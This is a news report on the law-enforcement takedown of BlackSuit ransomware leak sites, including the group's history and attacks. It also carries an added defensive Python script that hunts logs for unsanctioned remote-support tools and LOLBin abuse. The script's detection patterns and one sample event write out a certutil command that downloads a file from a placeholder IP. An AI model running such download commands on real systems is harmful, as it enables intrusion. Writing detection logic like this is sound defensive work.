BlackSuit Ransomware Sites Taken Down in Global Police Operation ‘Checkmate’

The notorious ransomware group BlackSuit has suffered a major blow after its dark web infrastructure was seized in an international law enforcement effort.

BlackSuit’s Websites Seized

On July 24, 2025, users attempting to access BlackSuit’s data leak portal on the dark web were greeted with a banner announcing the site’s seizure by U.S. Homeland Security Investigations (HSI). The message indicated that the takedown was part of a coordinated global investigation named “Operation Checkmate.”

Although no official statement had been issued at the time, the banner revealed the operation involved the U.S. Department of Justice (DoJ) and 16 law enforcement entities across nine countries. Among the collaborators were agencies from the United Kingdom, Ukraine, and Latvia, as well as Europol and the cybersecurity company Bitdefender.

Who Is BlackSuit? A Legacy of Cybercrime

BlackSuit emerged in May 2023, but security researchers believe it to be a rebrand of the Royal ransomware group, which itself was a successor to the infamous Conti gang.

Conti operated aggressively from 2019 to 2022, launching high-impact attacks such as the Costa Rican government breach in 2022. When Conti dissolved, its affiliates splintered into new operations, with one faction forming Royal, responsible for the City of Dallas attack in May 2023.

Soon after, Royal introduced a new encryptor and rebranded as BlackSuit. Unlike most contemporary groups, BlackSuit does not run a Ransomware-as-a-Service (RaaS) affiliate model; its intrusions are believed to be carried out solely by its core members.

Major Attacks and Financial Demands

Since its formation, BlackSuit has claimed responsibility for 184 cyberattacks, including high-profile incidents:

  • Octapharma Plasma (April 2024) — Operations at over 160 donation centers were disrupted.
  • CDK Global (June 2024) — A ransomware attack caused widespread system outages across 15,000 North American auto dealerships, with damages reportedly reaching $1 billion.
  • Additional victims include ZooTampa, the Brazilian government, and Western Municipal Construction.

The group is known for double extortion: encrypting files while also threatening to publish data stolen before encryption. BlackSuit also leverages legitimate Remote Monitoring and Management (RMM) tools to maintain access to compromised systems, since a sanctioned-looking remote support agent blends into normal administrative activity.

According to the CISA advisory (August 2024), their ransom demands typically ranged between $1M and $10M, with the highest noted demand at $60M. In just two years, BlackSuit is believed to have demanded over $500M from victims.

From BlackSuit to Chaos?

While the takedown marks a significant disruption, it appears no arrests have been made so far. Cybersecurity experts from Cisco Talos suggest that a new ransomware group called Chaos may be a rebrand or continuation of BlackSuit operations.

Talos highlighted shared tactics, techniques, and procedures (TTPs) between Chaos and BlackSuit, including similarities in encryption techniques and ransom notes, and the use of LOLBins (living-off-the-land binaries) and RMM software.
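The RMM-for-persistence behaviour described above and the RMM/LOLBin overlap Talos points to in the Chaos comparison both come down to the same defender's problem: legitimate signed binaries running where, or how, they should not. The following hunt is an added example written for this article, not code from BlackSuit, Talos, CISA or the article's source. It reads JSON-lines process-creation events and flags RMM agents on hosts where no such agent is expected, plus a handful of LOLBin command-line indicators. The RMM binary names, the LOLBin patterns, the host inventory and the event schema are all illustrative assumptions; the sample telemetry is constructed.

```python
"""Hunt for unsanctioned RMM agents and LOLBin abuse in process-creation logs.

Added example for this article; not BlackSuit tooling or vendor code.
Tool names, command-line patterns, host names and the log schema are
illustrative assumptions, not facts from the article or the CISA advisory.
"""
import json
from pathlib import PureWindowsPath

# Assumed watchlist of executables shipped by popular RMM products.
RMM_BINARIES = {
    "anydesk.exe",
    "ateraagent.exe",
    "splashtopstreamer.exe",
    "logmein.exe",
    "screenconnect.clientservice.exe",
    "teamviewer.exe",
}

# Assumed deployment inventory: hosts on which a given RMM agent is expected.
# An RMM agent anywhere else is a persistence candidate worth triage.
SANCTIONED_RMM = {
    "it-jump01": {"screenconnect.clientservice.exe"},
}

# Assumed LOLBin indicators (case-insensitive substring checks on the command line).
# These binaries have benign uses, so the argument pattern fires, not the binary.
LOLBIN_PATTERNS = {
    "certutil.exe": ("-urlcache", "-decode", "-encode"),
    "mshta.exe": ("http://", "https://", "javascript:", "vbscript:"),
    "regsvr32.exe": ("/i:http", "scrobj.dll"),
    "rundll32.exe": ("javascript:", "url.dll,openurl"),
}


def _basename(image: str) -> str:
    """Lower-cased file name of a Windows image path (e.g. 'anydesk.exe')."""
    return PureWindowsPath(image).name.lower()


def analyze(lines):
    """Return findings for an iterable of JSON-lines process-creation events.

    Each event is assumed to carry host, user, image and cmdline keys.
    Unparseable lines are skipped so one bad record cannot hide the rest.
    """
    findings = []
    for raw in lines:
        try:
            ev = json.loads(raw)
        except json.JSONDecodeError:
            continue
        host = ev.get("host", "").lower()
        user = ev.get("user", "")
        exe = _basename(ev.get("image", ""))
        cmd = ev.get("cmdline", "").lower()

        # RMM agent present on a host where the inventory does not expect it.
        if exe in RMM_BINARIES and exe not in SANCTIONED_RMM.get(host, set()):
            findings.append({"host": host, "user": user, "kind": "unsanctioned_rmm", "image": exe})

        # LOLBin invoked with an argument pattern typical of download/execute abuse.
        for needle in LOLBIN_PATTERNS.get(exe, ()):
            if needle in cmd:
                findings.append({"host": host, "user": user, "kind": "lolbin_abuse",
                                 "image": exe, "indicator": needle})
                break
    return findings


# Constructed sample telemetry (TEST-NET address, fictional hosts), not real victim data.
SAMPLE_EVENTS = [
    r'{"host": "IT-JUMP01", "user": "CORP\\helpdesk", "image": "C:\\Program Files (x86)\\ScreenConnect Client\\ScreenConnect.ClientService.exe", "cmdline": "ScreenConnect.ClientService.exe"}',
    r'{"host": "FILESRV02", "user": "CORP\\svc_backup", "image": "C:\\ProgramData\\AnyDesk\\AnyDesk.exe", "cmdline": "AnyDesk.exe --service"}',
    r'{"host": "WS-FINANCE-17", "user": "CORP\\jdoe", "image": "C:\\Windows\\System32\\certutil.exe", "cmdline": "certutil.exe -urlcache -split -f http://198.51.100.20/up.dat C:\\Users\\Public\\up.dat"}',
    r'{"host": "DC01", "user": "CORP\\admin", "image": "C:\\Windows\\System32\\certutil.exe", "cmdline": "certutil -hashfile C:\\Windows\\System32\\ntoskrnl.exe SHA256"}',
    r'{"host": "WS-FINANCE-17", "user": "CORP\\jdoe", "image": "C:\\Windows\\System32\\notepad.exe", "cmdline": "notepad.exe budget.txt"}',
    "this line is not json and must be skipped",
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f)
```

Running the block flags two of the six constructed events: AnyDesk on FILESRV02 (no RMM is sanctioned there) and the certutil download on WS-FINANCE-17, while the sanctioned ScreenConnect client on IT-JUMP01 and the legitimate certutil hash check on DC01 stay quiet. The inventory lookup is the important design choice: alerting on every RMM agent drowns the helpdesk's own tooling in noise, whereas alerting on agents that contradict the deployment inventory catches the attacker-installed copy.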

International Cooperation in Cybercrime Enforcement

Agencies reportedly involved in Operation Checkmate include:

  • U.S. Secret Service
  • Dutch National Police
  • German Federal Criminal Police
  • UK National Crime Agency (NCA)
  • Frankfurt Prosecutor’s Office
  • Ukrainian Cyber Police

While neither the NCA nor the DoJ has formally confirmed details, the seizure of BlackSuit’s infrastructure marks a strong signal of growing global coordination against ransomware actors.

Source: https://www.infosecurity-magazine.com/news/blacksuit-ransomware-sites-seized